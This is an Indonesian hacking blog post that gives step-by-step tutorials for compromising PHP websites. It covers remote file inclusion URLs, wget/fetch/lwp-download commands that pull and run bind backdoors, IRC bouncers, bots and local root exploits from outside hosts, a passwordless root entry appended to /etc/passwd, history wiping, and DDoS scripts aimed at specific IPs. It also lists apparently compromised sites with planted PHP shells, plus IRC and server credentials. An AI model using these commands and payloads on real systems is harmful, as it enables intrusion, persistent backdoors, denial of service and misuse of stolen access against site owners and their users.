Sabtu, 24 Januari 2009

Cara Menginject Website dg Target Php

: CARA MENG-INJECT WEBSITE DENGAN TARGET PHP :

1. Cari target di google.com dengan menggunakan keyword
+My_eGallery index = .com atau
+My_eGallery main = .com, bisa juga
+My_eGallery index = .net, atau
+My_eGallery main = .net

2. Target telah ditemukan, kemudian gunakan formula :
Target + File Inject + cd var/tmp + command = Hasil Inject
Contoh :

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho/injeck.txt?&cmdvar;cd tmp;ls –al

3. Setelah formula tersebut digunakan, maka website target yang telah dihack akan memunculkan daftar folder shell. Apabila website yang telah diinject memunculkan daftar folder shell, maka gunakan command :

find /-type d –perm 777
Dimana command tersebut digunakan untuk mencari folder shell yang bisa dipakai.

4. Setelah folder anda dibuat, maka downloadlah file bind atau psybnc untuk mencoba apakah folder yang anda buat tadi dapat digunakan atau tidak. File Bind digunakan untuk mengaccess shell hasil target ke dalam putty. Contoh :

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho1.txt?&cmd
var;cd tmp; <----- ditambahkan command dibawah ini :
mkdir …
chmod 777 …
cd …
wget geocities.com/aa_sunda/bind.txt, atau
fetch http://www.geocities.com/aa_sunda/bind.txt
ls -alF
mv bind.txt a.c
gcc –o a a.c
chmod 777 a
./a

Catatan : Setiap command yang ditambahkan, gunakanlah di depan command tersebut target berikut file injectnya.

6. Setelah command diatas digunakan akan terlihat “ Arsad Backdoor”. Nah setelah itu, maka bukalah file putty.exe untuk mengaccess shell dengan target host sesuai dengan nama target hasil inject, atau bisa juga dengan men-DNS target ke dalam irc server untuk mengetahui IP address target yang sesunguhnya. Masih di dalam file putty, ubahlah port 22 telnet menjadi port 1980 telnet, kemudian tekan Enter.

7. Setelah masuk ke dalam shell, akan muncul “Password : “. Hal ini dimaksudkan file bind yang telah anda tanam berhasil diproses. Kemudian masukkan password untuk mengaccess shell tersebut. Contoh : Password : cavalera

8. Setelah password dimasukkan, maka anda telah siap untuk beroperasi di dalam shell target yang anda dapatkan.

9. Cara beroperasi di dalam shell dapat anda lihat pada CARA OPERASI SHELL.

10. Dengan cara yang sama anda dapat langsung mengoperasikan hasil target pada website. Gunakan langsung perintah wget atau fetch untuk mendownload file ke dalam shell target anda.Contoh Untuk Menginstall PsyBNC langsung dalam target website :

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho/injeck.txt?&cmd
var;cd tmp; <----- ditambahkan command dibawah ini :
mkdir …
chmod 777 …
cd …
wget www.baganbatu.com/psy.tar.gz, atau
fetch http://h1.ripway.com/jinho/psy.tar.gz
tar –zxvf psy.tar.gz
cd .psy
./config
./fuck
./run <----- psyBNC dengan port 31337

atau

http://www.target.com/modules/my_eGallery/index.php?basepath=http://www.varemat.com/admini/jinho/injeck.txt?&cmd
var;cd tmp; <----- ditambahkan command dibawah ini :
mkdir …
chmod 777 …
cd …
wget http://h1.ripway.com/jinho/psy.tar.gz, atau
fetch http://geocities.com/baganbatu@ymail.com/psy.tar.gz
tar –zxvf psy.tar.gz
rm –rf psy.tar.gz <----- dimaksudkan untuk menghapus file
cd .psy
./config <--- contoh : ./config 20000
./fuck
./run <----- psyBNC dengan port 20000

Catatan : Tidak semua port yang anda gunakan dapat dijinkan (Aborting Port), untuk lebih jelasnya carilah tutorial/cara khusus menginstall psybnc di website google.com. Disana anda dapat dengan mudah dan memahami cara menginstall psyBNC.

11. Selesai
CARA OPERASI SHELL :
Setelah anda masuk di dalam shell target dengan menggunakan putty. Gunakanlah command berikut ini cd var/tmp
ls –alF
mkdir …
chmod 777 …
cd …
ls –alF

Catatan : untuk mengetahui cara menginstall psyBNC, Bot Eggdrop, dan Eksploit Local Root lihatlah pada uraian di bawah ini.

1. Untuk menginstall psyBNC di dalam shell gunakan command di bawah ini :

wget http://h1.ripway.com/jinho/psy.tar.gz, atau
fetch http://www.baganbatu.com/psy.tar.gz
tar –xzvf psy.tar.gz
chmod 777 .psy
cd .psy
./config
./fuck
./run

2. Untuk menginstall Bot Eggdrop dengan menggunakan file precompile, ikuti command di bawah ini

wget http://h1.ripway.com/jinho/jinho.tar.gz, atau
fetch http://geocities.com/baganbatu@ymail.com/jinho.tar.gz
tar –zxvf jinho.tar.gz
rm –rf jinho.tar.gz
chmod 777 .egg
cd .egg
./ayu (file config bot) (nick bot) (ident bot) (IP adress) (channel
tanpa #) (nick owner) <--- contoh : ./ayu conf botdent user 203.14.155.134 riauhacker jinho
./dssl conf

Setelah command diatas selesai, maka anda tinggal menunggu bot yang anda buat masuk ke dalam channel yang telah anda setting. Apabila bot yang anda buat tidak muncul juga, berarti IP address yang anda gunakan pada bot telah kena Akill. Gantilah IP Address tadi dengan IP Address
lainnya.Apabila anda bingung, bagaimana caranya mengetahui IP Address yang ada, gunakan command

/sbin/ifconfig

Setelah IP Address yang ada ditampilkan, segeralah mengganti IP Address bot tadi dengan IP Address yang ada.

3. Untuk mengeksploit local root gunakan perintah dibawah ini :

wget geocities.com/bankbankdut/root.tar.gz, atau
fetch http://www.geocities.com/bankbankdut/root.tar.gz
tar –xzvf root.tar.gz
rm –rf root.tar.gz
mv root .ssh
chmod 777 .ssh
cd .ssh
./root

Apabila hasil yang ditampilkan dari command diatas memunculkan kata “Signed …… OK” berikut nomor pid (Contoh : 13657), maka anda telah berhasil mencapai access root. Stelah berhasil dalam mengeksploit local root, gunakan command berikut :

Whoami <----- Untuk mengetahui access anda dalam shell pada saat
beroperasi
Su
Adduser (Username)
(Password User)

Baiklah, ada cara lain yang memungkinkan kita mendapatkan root. Pada metode pertama, kita mengetikkan 'linuxconf' pada bash shell prompt, bagaimanapun, kita dapat mengetik hal berikut untuk membuat suatu account baru dengan kemampuan root dan tanpa password:

echo "ankit::0:0:::" >> /etc/passwd

Perintah ini secara langsung mengedit file /etc/passwd yang merupakan password file yang menyimpan Password dan Username dari untuk account pada mesin tersebut. Sesuatu hal yang perlu diingat disini adalah anda hanya dapat mengedit file /etc/passwd jika anda melakukan login sebagai root, dan dalam hal ini kita melakukan boot ke linux dengan linux single, jadi kita dapat melakukannya.Untuk mengerti bagaimana persisnya perintah diatas bekerja dan bagaimana hal tersebut dapat membuat suatu account baru tanpa password, kita perlu mengerti struktur file /etc/passwd.Berikut ini adalah suatu baris dari password file:

ankit:my_password:2:3:Ankit Fadia:/home/ankit:/bin/bash

Baris tersebut diatas dapat dipecahkan menjadi:
? Username: ankit
? Encrypted Password: my_password
? User number: 2
? Group Number: 3
? Actual Name: Ankit Fadia (Optional)
? Home Directory: /home/ankit (Optional)
? Type of Shell: /bin/bash (Optional)
Pada perintah diatas, kita tidak mengikutsertakan field-field optional
dan field password. Perintah kita:

echo "ankit::0:0:::" >> /etc/passwd

dapat ditulis sebagai:
? Username: ankit
? Encrypted Password:
? User number: 0
? Group Number: 0
? Actual Name:
? Home Directory:
? Type of Shell:
Pada dasarnya hal ini akan membuat suatu account baru dengan kemampuan root, yang mana dapat anda gunakan sebagai Backdoor kedalam sistem.“ SEMOGA TUTORIAL INI DAPAT BERMANFAAT,JANGAN CEPAT PUTUS ASA ”SELAMAT MENCOBA"

tutorial hacking

=============================
--==[[ Petuah jin-nakal]]==--
=============================

Hacking adalah kesungguhan untuk belajar, Hacking adalah "diam" tapi
otaknya bekerja, Hacking adalah sebuah proses kebebasan. Seorang hacker
adalah seseorang yang ingin mengerti sebuah sistem, mengetahui bagaimana
sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di
server tersebut dan tertarik dalam menemukan bugs/kelemahan2 sistim itu sendiri.

===========
ALAT PERANG
===========

http://web2ftp.com <-untuk ftp

http://e107.org/edownload.php <--souce php cms

======
injeck
======

http://webkis.freecoolsite.com/injeck.txt?&cmd <==tembak

http://webkis.freecoolsite.com/anjunbot.txt?&cmd <==bot

http://www.geocities.com/onald_doank/hack.txt?&cmd <==tembak pake tools yg lebih lengkap

http://onadoa.freefronthost.com/hacking.txt?&cmd <===tools rozi

=========================================
KALO DAH MASUK....TEMBAK PAKE COMMAND INI
=========================================

directory ==> find / -type d -perm 777

directory ==> find / -user nobody -group nobody -type d


directory ==> find / -user apache -group apache -type d

directory ==> find / -perm 0777 -type d

liat server ==> uname%20-a;id

liat inert/ip ==> /sbin/ifconfig

tar -czvf file.tar.gz [dir] <===mau ngetar

find | grep password

find | grep passwd

find | grep agora <==== nyari cc

cat /etc/passwd


wget argento-bali.com/xpl/bin.txt;perl bin.txt <==jalan kan scanning

/home/monalisa <-- aku pilih ini ...
dan masuk ke folder public_html ...


fetch

GET -v <===sunOs
==============================
ROOT port 8888/pass 0168565966
==============================

lwp-download http://www.grothwoodshop.com/includes/door.tgz;tar -zxvf door.tgz;cd .door;chmod 755 divre;chmod 755 kik;./kik /usr/sbin/httpd ./divre <==port 12345/lovedivre5

lwp-download http://www.nnprock.com/php/news/anjun/door.tgz;tar -zxvf door.tgz;cd .door;chmod 755 divre;chmod 755 kik;./kik /usr/sbin/httpd ./divre <==port 12345/lovedivre5

lwp-download http://www.geocities.com/pinscasher/root.gz;tar -zvxf root.gz;cd root;./loginx 1970 1970

lwp-download http://www.geocities.com/riau_hacker/root.gz;tar -zvxf root.gz;cd root;./loginx 1970 1970



gunzip http://www.geocities.com/pinscasher/root.gz;root.gz;cd root;./loginx 1970 1970 <====root mantaff

badung.go.id 8888 <--telnet

badung.go.id 22 anjun/mautauaja <==user

===================
Command Dasar Linux
===================

Untuk mengerti dan memahami linux ada baiknya hal awal yang mesti dipahami dan dimengerti adalah command shell di dalam linux sebab hampir semua pekerjaan didalam linux di eksekusi melalui command shell

dibawah ini adalah command shell yang wajib untuk diketahui dan pada umumnya digunakan :

ls : seperti command dir di cmdnya windows, buat menampilkan list directory dan file opsi-opsinya :

-R Menampilkan list sampai ke subdirectory dari direktori kita sekarang
-l list secara long mode, menampilkan permission serta nama user pemilik file or directory
-a list file-file hidden n non hidden

pwd : mengetahui directory sekarang tempat kita berada

whereis : mencari lokasi file sama halnya dengan menggunakan perintah locate

cp : untuk mengcopy file dan bila untuk mengcopy directory menggunakan opsi -r

mv : untuk merename atau memindahkan file atau directory

rm : menghapus file or directory,biasanya dengan opsi -rf (recursif n force)

cd : untuk change directory

more : untuk melihat perhalaman

who / w / finger : untuk mengetahui user yang sedang aktif

passwd : untuk ganti password user anda

su : untuk menjadi user root atau user lain

wc : menghitung banyak byte,baris,huruf,kalimat

kill : untuk menghentikan sebuah proses

ps : untuk melihat proses yang sedang berjalan

chmod : untuk mengubah permission suatu file atau directory

chown : untuk mengubah kepemilikan suatu file atau directory

chgrp : untuk mengubah group suatu file atau user

at / cron : untuk schedulling

tar : untuk mengekstrak file ter compres

rpm : untuk menginstall file rpm

chkconfig : melihat,menambah,menghapus program yang berjalan pada waktu start up

lsmod : melihat modul-modul yang ada

rmmod : menghapus modul-modul yang ada

ldconfig : meload configurasi

sudo : melakukan perintah dengan priveleges root

mungkin itu beberapa perintah dasar linux yang dapat kami tuliskan disini, tinggal kreatifitas dan kemauan untuk melakukan explorasi, experimen dan riset yang mendalam terhadap linux, dan untuk mengetahui lebih banyak tentang perintah di command shell itu tinggal menggunakan " --h " atau " -? " contoh : " tar --h " (perintah itu dijalankan tanpa tanda kutip)


===========================================================


id --> user con il quale si � entrati
uname -a --> versione del sistema
ls --> lista file nella cartella dove si �
ls -la --> lista file + specifiche e permessi
cd [nomecartella] --> per entrare in una cartella
cd [cartella]/[cartella] --> per entrere in una sottocartella
mkdir [nomecartella] --> crea una cartella
df -h --> vedere le specifiche degli hardisk e partizioni
wget [url]/[file] --> scaricare un file
GET [url]/[file]>[file] --> scaricare un file
curl [url]/[file] -o [file] --> scaricare un file
fetch [url]/[file] --> scaricare un file
tar -xzvf [file] --> decomprimere un file .tar.gz o .tgz
find / -perm 777 --> trovare una cartella dove si hanno i permessi di scrittura
chmod 777 [file] --> da i permessi a un file in una cartella dove si hanno i permessi
./[file] --> avvia il file
mv [file] [nuovonome] --> rinomina file
mv [cartella] [nuovo nome] --> rinomina la cartella
mv [file] [cartella] --> sposta il file nella cartella
pwd --> mostra la cartella in qui si � ora
ps x --> mostra i processi attivi
rm [nomefile] --> rimuove un file
rm [nomefile] [nomefile] --> rimuove + file
rm -rf [cartella] --> rimuove la cartella con i file dentro
rmdir [cartella] --> rimuove una cartella vuota
cat [nomefile.txt] --> mostra il file.txt
echo [testo]>[file.txt] --> cancella il file.txt e ci scrive testo
echo [testo]>>[file.txt] --> aggiunge testo nell'ultima riga di file.txt
gcc -o [file] [file.c] --> compila il file.c in file
perl [file.pl] --> avvia un file in perl
uptime --> visualizza il tempo di up della macchina
whereis [file] --> visualizza dove si trova un file di sistema tipo wget

==========
TCL.EGGROP
==========

wget http://www.osoktrading.com/oneadmin/_files/anjun/loader.tar.gz;tar -zvxf loader.tar.gz;cd loader;./nadya conf bot-01 ane 209.216.253.244 riauhacker jin_nakal;./run conf /usr/local/apache ;cd scripts;./autobotchk conf /var/tmp/loader -noemail -5 <===-untuk flood

http://www.osoktrading.com/oneadmin/_files/anjun/loader.tar.gz;tar -zvxf loader.tar.gz;cd loader;./nadya conf bot-01 ane 209.216.253.244 riauhacker jin_nakal;./run conf /usr/local/apache ;cd scripts;./autobotchk conf /var/tmp/loader -noemail -5 <====auto join ke kiss

wget http://www.nnprock.com/php/news/anjun/jin.tar.gz;tar -zvxf jin.tar.gz;cd jin;./nadya conf hitam putih 87.248.180.98 riauhacker jin_nakal;./eggdrop -m conf <===multi tcl

wget http://geocities.com/riau_hacker/kissgames.tar.gz;cd kissgames;./b conf Kiss-games Kiss 87.106.87.159 kiss jin_nakal;./eggdrop -m conf <===3 in 1 game

wget http://www.nnprock.com/psyanjun.tar.gz;tar -zvxf psyanjun.tar.gz;cd anjun;./config admin 2005;./fuck;./run

==============
tools.phpshell
==============

wget http://www.geocities.com/onald_doank/THIEFPHP.txt;mv THIEFPHP.txt shell.php

wget http://www.geocities.com/riau_hacker/phpshell.txt;mv phpshell.txt php.php <==shell.php

wget http://www.geocities.com/onald_doank/hack.txt;mv hack.txt hack.php <==tools.phpshell

========
CADANGAN
========

http://wp1016957.wp030.webpack.hosteurope.de/_cms/index2.php?includes_dir=http://www.geocities.com/onald_doank/hack.txt?&cmd

http://www.ircscripters.net/bugtracker/class.mysql.php?path_to_bt_dir=http://www.artofcar.ch/event/hole.txt?&cmd

http://www.thescein.com/index.php?mode=http://www.grothwoodshop.com/includes/hole.txt?&cmd

http://tijuana.ch/main.php?page=http://www.grothwoodshop.com/includes/hole.txt?&cmd

=========
php shell
=========

http://silentdon.com/php.php

http://www.grothwoodshop.com/php.php

http://202.46.69.186/yudi.php

http://www.thescein.com/anjun/php.php

http://jin.freefronthost.com/tcl/phpshell.php

http://www.webz24.de/event/anjun/php.php

http://www.design-kamin.de/CultSiteDWv2/NAVIGATION/artmedic_event/php.php

http://www.superslickstuff.com/php.php

http://www.videbech.dk/php.php

http://duckwoman.igloe.net/anjun/php.php

http://www.totalcombatzone.com/modules/vwar/admin/anjun/php.php

http://koranto.com/php.php

http://onadoa.freefronthost.com/THIEFPHP.php

http://www.artofcar.ch/event/tool.php

http://www.grothwoodshop.com/includes/php.php

http://php.rtaclan.de/modules/PNphpBB2/includes/tool.php

http://www.nnprock.com/php/news/anjun/tool.php

http://members.lycos.co.uk/retak/cardink/3.txt

http://anjun.awardspace.com/php.php

http://webkis.freecoolsite.com/php.php

http://www.undercover-freak.net/php.php

http://www.osoktrading.com/oneadmin/_files/anjun/shell.php

======
PSYBNC
======

http://www.one.net.ua/content.php?file=http://www.grothwoodshop.com/includes/hole.txt?&cmd
http://202.46.69.186/yudi/auction/auction/auction_common.php?phpbb_root_path=http://www.grothwoodshop.com/includes/hole.txt?&cmd
/server sunvalleyoptics.com 2006 anjun2006 IDENT anjun

/server host-148-244-244-242.block.alestra.net.mx 2006 anjun2006 ident anjun

/server www.ircscripters.net 36874 mautauaja ident pemilik

/server 211.100.61.163 6668 mautauaja ident pemilik

/server kalau.gue.dingin.kenapa.loe.yang.panas.uk.to 6666 dewata ident anjun

=============================
: MARI KITA MAINKAN ROOTNYA :
=============================

unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.norifumiya.org/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1

GOT IT! Your magic number is : 864
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng'
in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 864" to get
rootshell

*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 864 -b 1

Good Luck d0inks!


mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)

===================================

[JANGAN DI PAKE SEMBARANGAN..!!!!!]

===================================

lwp-download http://geocities.com/issueznet/tools/ddos.pl;perl -c ddos.pl;chmod 755 ddos.pl;perl ddos.pl 222.124.5.243 80 1000000000000000000000000000000000000000000000000000000000000000000000000000000

wget http://onadoa.freefronthost.com/Ddos-tools/targa.c;chmod 777 targa.c;./targa.c 202.159.6.164 53 10

/server sh81.surpasshosting.com 6666 mautauaja port 6666
/server sunvalleyoptics.com 2006 mautauaja port 2006 anjun

kUMpuLaN sOuRcE bOt

source bot bawel

source bot user

source bot ping

source bot bom

kalau mau edit aja langsung plendz

aPLiKasi cHat hP

Download Mobilirc
Download CoolIRC
Download CoolIRC 3.1
Download JmIRC
Download Jmirc-m 0.34 English
Download Xirc
Download Cchat
Download Wlirc 1
Download Wlirc 2
Download VIrc
Download Barabasirc
Download WirelessIRC 1.8
Download WirelessIRC-2.00
Download Mtvirc
Download Kirc
Download Irchat
Download Snirc
Download Jedirc 3.1
Download Jedirc 3.2 Midp 1
Download Jedirc 3.2 Midp 2
Download JedIrc 3.2.2
Download IslamIRC
Download InetToolsIRC
Download InetToolsIRC-Indo
Download DropMe_IRCer Rusian
Download Iirc Rusian
Download Dmirc Rusian
Download Yahoo M! Chat
Download Nimbuzz
Download Bing
Download Mxit
Download RemixmigUltimad
Download Mig33
Download YB 2.0
Download IMHere
Download Opera Mini 4 Indonesia
Download Opera Mini 4.1
Download Gmail

Install psyBNC Precompiled di Target RFI

Install psyBNC Precompiled di Target RFI
Written by you_the

psyBNC 1 :

Saya asumsikan kita telah mendapatkan target RFI dengan SAFE MODE OFF. Kenapa yg OFF? Karena fungsi-fungsi system, exec, passhthru, dan popen untuk mengeksekusi perintah shell ini aktif secara default. Nah, bagaimana cara kita mengeksekusi perintah tsb? Yaitu dengan menggunakan injector seperti r57, c99, atau Fx29. Disana kita akan menemukan input box untuk mengetikkan perintah2 shell, biasanya berlabel “Command”, “Run Command”, “Execute Command”, atau semacam itu. Baiklah.. Langsung aja ya..

Pertama kita harus berada di direktori yg full permission, ewh.. Apa itu full permission? Yaitu direktori/folder yg mengizinkan kita utk menulis/meletakkan file didalamnya. Masih bingung? Ya udah, kita langsung aja coba direktori yg biasanya full perm/writable diantaranya /var/tmp/, /var/spool/samba/.

Disini kita menggunakan injector Fx29Sh, untuk pindah ke direktori /var/tmp/ kita tinggal mengetikkannya di input box berlabel “Directory” dan klik tombol “GO”. Skr kita udah berada di direktori /var/tmp/, lalu ketikkan perintah2 dibawah ini di Input yg berlabel “Command”.

1. wget http://feelcomz.freehostia.com/fx.tgz

2. tar -zxvf fx.tgz

3. cd .fx;./config 29110

4. cd .fx;./run

Jika muncul baris dengan pesan “Listening on port 29110?, berarti psyBNC-nya udah jalan. Kemudian kita tes koneksinya di mIRC dengan mengetikkan:
/server 29110

Contoh: /server 127.0.0.1 29110 passgue

Jika berhasil, akan muncul pesan “Welcome to psyBNC” di mIRC kita dan ingat.. Ident/username yg pertama konek adalah admin psyBNC tsb dan password untuk konek ke psyBNC td adalah “passgue”. Untuk konek ke IRC, ketik /addserver irc.cbn.net.id:6667 dan tunggulah sampai psyBNC kita terhubung ke server IRC.

psyBNC 2 :

psyBNC adalah sebuah bouncer untuk dipergunakan dalam IRC. maksud dari bouncer disini adalah seperti mirror dimana kita melakukan koneksi ke server IRC melalui bouncer tersebut.

langkah-langkah nya adalah

  1. wget geocities.com/crewnewbie/tools/cbk.tar.gz atau
  2. lwp-download http://geocities.com/crewnewbie/tools/cbk.tar.gz
  3. tar -zxvf cbk.tar.gz
  4. cd .cbk
  5. ./config port #contoh ./config 3242
  6. ./fuck
  7. ./run
psyBNC 3 :

psyBNC ver 2.3.2-2 (udah di compile) Cara membuat psyBNC

Langkah - langkah pembuatan psyBNC:

1. wget http://channels.dal.net/nama/psy.tar.gz

2. tar -zvxf psy.tar.gz

3. cd .psy
4. ./config
contoh: ./config chanary 6693

ident = Dhany
port = 130177

5. ./fuck
perintah ini akan menghapus semua crontab dan membuat crontab baru untuk psyBNC, hati-hatilah menggunakannya

6. ./run
perintah ini akan menjalankan psyBNC, set ident di mIRC

sepnita_bOt

sepnita_bOt adalah sebuah cara baru dalam membuat bot tanpa mengedit secara manua file eggdrop.conf

sepnita_bOt

Langkah - langkah pembuatan bot:

1. wget http://channels.dal.net/nama/bot.tar.gz

2. tar -zvxf bot.tar.gz

3. cd .dat

4. ./nadya


contoh: ./nadya a.txt sepnita kerinci 815.130.41.667 kerinci you_the
fileconfig = a.txt (boleh diubah)
nick bot = sepnita
ident bot = sungaipenuh
IP bot = 815.130.41.667
channel = kerinci (jangan pake #)
owner bot = sepnita

5. ./dssl

Setelah bot join ke channel, pv botnya dan ketik:
pass

auth

sCriPt rEMotE

script invite

alias pesen {
if ( $$1 !isop $$2 ) {
notice $$1 pesan<<(isi pesan script anda)
}
}

On *:JOIN:#channel << (isi channel yg ingin anda invite):{
.timer 1 30 pesen $nick $chan
}

script ping

On 1:Text:!ping*:#: { ctcp $nick ping | %ping.chan = $chan | %ping.wkt = $ctime }
On 1:CtcpReply:ping*: {
if ( $nick ison %ping.chan ) msg %ping.chan » $nick : Ping Reply $calc( $ctime - %ping.wkt ) detik «
unset %ping.*
}

script slaps

on *:ACTION:*:#:{
if ($me isin $1- && slap isin $1-) {
inc -u20 %slap.me | var %i = %slap.me | $iif(%i > 4,return)
if (%i == 1) { describe $chan : SiaPaLaH YaNG SuKe SLaP-SLaP Ni.. oooooooo $nick ... NaK aPe SLaP2 Nie ??? }
if (%i == 2) { describe $chan : KaLau Ko BoRiNG PoN $nick JGN La SLaP aKu... }
if (%i == 3) { describe $chan : DaH La $nick JGN KaCau aKu...TGH BeRaK Nie... }
if (%i == 4) { describe $chan : MaLaS NaK LaYaN Ko. :Þ }
}
}